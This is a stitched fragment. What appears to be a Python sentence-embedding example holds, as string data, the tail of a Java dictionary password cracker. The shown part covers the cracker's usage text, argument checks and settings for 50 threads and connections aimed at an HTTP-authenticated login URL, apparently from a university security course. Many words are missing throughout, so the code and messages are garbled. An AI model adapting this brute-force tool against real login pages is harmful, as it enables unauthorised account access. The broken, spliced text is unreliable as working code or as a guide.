1 - ENHANCED Dictionary mode\");\n System.out.println(\" (dividing cracking jobs multiple threads) (default)\");\n System.out.println(\" URL : (opt) the URL crack \");\n System.out.println(\" (default : http://sec-crack.cs.rmit.edu./SEC/2/index.php)\");\n System.out.println(\" , : (optional) range of characters applied in the cracking\");\n System.out.println(\" where 1 <= <= 255 (default = 1)\");\n System.out.println(\" <= <= 255 (default = 3)\");\n System.out.println(\" username : (optional) the username that is used crack\");\n System.out.println();\n System.out.println(\" NOTE: The optional parameters '','', and 'username'\");\n System.out.println(\" have specified altogether none at all.\");\n System.out.println(\" For example, if [] is specified, then [], and [username]\");\n System.out.println(\" have specified as well. If none of them specified,\");\n System.out.println(\" default values used.\");\n System.out.println();\n System.out.println(\" Example of invocation :\");\n System.out.println(\" java Dictionary \");\n System.out.println(\" java Dictionary 0\");\n System.out.println(\" java Dictionary 1 http://localhost/tryme.php\");\n System.out.println(\" java Dictionary 0 http://localhost/tryme.php 1 3 \");\n System.out.println(\" java Dictionary 1 http://localhost/tryme.php 1 10 \");\n System.out.println();\n System.out.println();\n }\n \n \n public static void paramCheck(String[] args) {\n int argc = args.length;\n \n \n try {\n switch (Integer.valueOf(args[0]).intValue()) {\n case 0: {\n isenhanced = false;\n } break;\n case 1: {\n isenhanced = true;\n } break;\n default:\n System.out.println(\"Syntax error : invalid mode '\"+args[0]+\"'\");\n printSyntax();\n System.exit(1);\n }\n } catch (NumberFormatException e) {\n System.out.println(\"Syntax error : invalid number '\"+args[0]+\"'\");\n printSyntax();\n System.exit(1);\n }\n \n if (argc>1) {\n try {\n \n URL u = new URL(args[1]);\n \n \n try {\n HttpURLConnection conn = (HttpURLConnection) u.openConnection();\n \n switch (conn.getResponseCode()) {\n case HttpURLConnection.HTTP_ACCEPTED:\n case HttpURLConnection.HTTP_OK:\n case HttpURLConnection.HTTP_NOT_AUTHORITATIVE:\n case HttpURLConnection.HTTP_FORBIDDEN:\n case HttpURLConnection.HTTP_UNAUTHORIZED:\n break;\n default:\n \n \n System.out.println(\"Unable open connection the URL '\"+args[1]+\"'\");\n System.exit(1);\n }\n } catch (IOException e) {\n System.out.println(e);\n System.exit(1);\n }\n \n THEURL = args[1];\n } catch (MalformedURLException e) {\n \n System.out.println(\"Invalid URL '\"+args[1]+\"'\");\n printSyntax();\n System.exit(1);\n }\n }\n \n \n if (argc==5) {\n try {\n MINCHAR = Integer.valueOf(args[2]).intValue();\n } catch (NumberFormatException e) {\n System.out.println(\"Invalid range number value '\"+args[2]+\"'\");\n printSyntax();\n System.exit(1);\n }\n \n try {\n MAXCHAR = Integer.valueOf(args[3]).intValue();\n } catch (NumberFormatException e) {\n System.out.println(\"Invalid range number value '\"+args[3]+\"'\");\n printSyntax();\n System.exit(1);\n }\n \n if ((MINCHAR<1) || (MINCHAR>255)) {\n System.out.println(\"Invalid range number value '\"+args[2]+\"' (must between 0 and 255)\");\n printSyntax();\n System.exit(1);\n } else\n if (MINCHAR>MAXCHAR) {\n System.out.println(\"Invalid range number value '\"+args[2]+\"' (must lower than the value)\");\n printSyntax();\n System.exit(1);\n }\n \n if (MAXCHAR>255) {\n System.out.println(\"Invalid range number value '\"+args[3]+\"' (must between value and 255)\");\n printSyntax();\n System.exit(1);\n }\n \n USERNAME = args[4];\n } else\n if ((argc>2) && (argc<5)) {\n System.out.println(\"Please specify the [], [], and [username] altogether none at all\");\n printSyntax();\n System.exit(1);\n } else\n if ((argc>2) && (argc>5)) {\n System.out.println(\"The number of parameters expected is not more than 5. \");\n System.out.println(\" have specified more than 5 parameters.\");\n printSyntax();\n System.exit(1);\n }\n }\n \n public static void main(String[] args) {\n MINCHAR = 1;\n MAXCHAR = 3; \n \n \n if (args.length==0) {\n args = new String[5];\n args[0] = String.valueOf(1); \n args[1] = THEURL;\n args[2] = String.valueOf(MINCHAR);\n args[3] = String.valueOf(MAXCHAR);\n args[4] = USERNAME;\n }\n \n \n paramCheck(args);\n \n \n readThroughDictionary();\n \n \n Application = new Dictionary();\n }\n \n public static Dictionary Application;\n public static String THEURL\t\t= \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\";\n public static String DICTIONARY = System.getProperty(\"user.dir\")+\"/words\";\n public static String TEMPDICT = System.getProperty(\"user.dir\")+\"/~words\";\n public static boolean isenhanced;\t\t\n public static String passw\t\t= \"\";\t\n \n public static final int REPORT_INTERVAL = 1; \n public static int MAXTHREAD = 50; \n public static int MAXCONN = 50; \n public static int\t curconn = 0; \n public static int success = -1; \n \n public static String USERNAME = \"\"; \n public static int MINCHAR; \n public static int MAXCHAR; \n public static int ALLCOMBI; \n \n public static int start ,end; \n public static int MAXCACHE = 100; \n \n public static java.util.Timer reportTimer; \n public static HttpURLConnection connections[] = new HttpURLConnection[MAXCONN]; \n public static boolean\t connused[]\t = new boolean[MAXCONN]; \n public ThCrack[] threads = new ThCrack[MAXTHREAD]; \n public static int attempt = 0; \n public static int idxLimit;\t\t \n}\n" ] embeddings = model.encode(sentences) similarities = model.similarity(embeddings, embeddings) print(similarities.shape) # [4, 4]